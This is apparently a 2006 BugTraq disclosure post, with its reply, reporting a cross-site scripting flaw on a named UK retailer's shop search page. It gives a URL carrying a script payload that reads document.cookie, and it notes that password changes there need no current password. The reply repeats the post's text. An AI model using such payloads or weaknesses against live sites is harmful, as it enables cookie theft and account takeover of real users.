BugTraq
Back to list
|
Post reply
GamePlay.co.uk XSS
Jun 10 2006 12:57AM
charlie thehackersplace org
(1 replies)
Homepage: www.gameplay.co.uk
Example:
http://shop.gameplay.co.uk/webstore/advanced_search.asp?Keyword=&terms=!
&badterm=<script>alert(document.cookie)</script>
Also...
The current password is not necessary for a successful password change for members of gameplay.co.uk which makes changing passwords through scripts as easy as tying your shoe lace.
(https://shop.gameplay.co.uk/gameplay/changepassword.asp)
I tried emailing these clowns about their silly flaws, but I had no joy.
Charlie.
[ reply ]
Re: GamePlay.co.uk XSS
Jun 14 2006 01:10AM
Patrick Morris (patrick morris hp com)
Privacy Statement
Copyright 2010, SecurityFocus
Example:
http://shop.gameplay.co.uk/webstore/advanced_search.asp?Keyword=&terms=!
&badterm=<script>alert(document.cookie)</script>
Also...
The current password is not necessary for a successful password change for members of gameplay.co.uk which makes changing passwords through scripts as easy as tying your shoe lace.
(https://shop.gameplay.co.uk/gameplay/changepassword.asp)
I tried emailing these clowns about their silly flaws, but I had no joy.
Charlie.
[ reply ]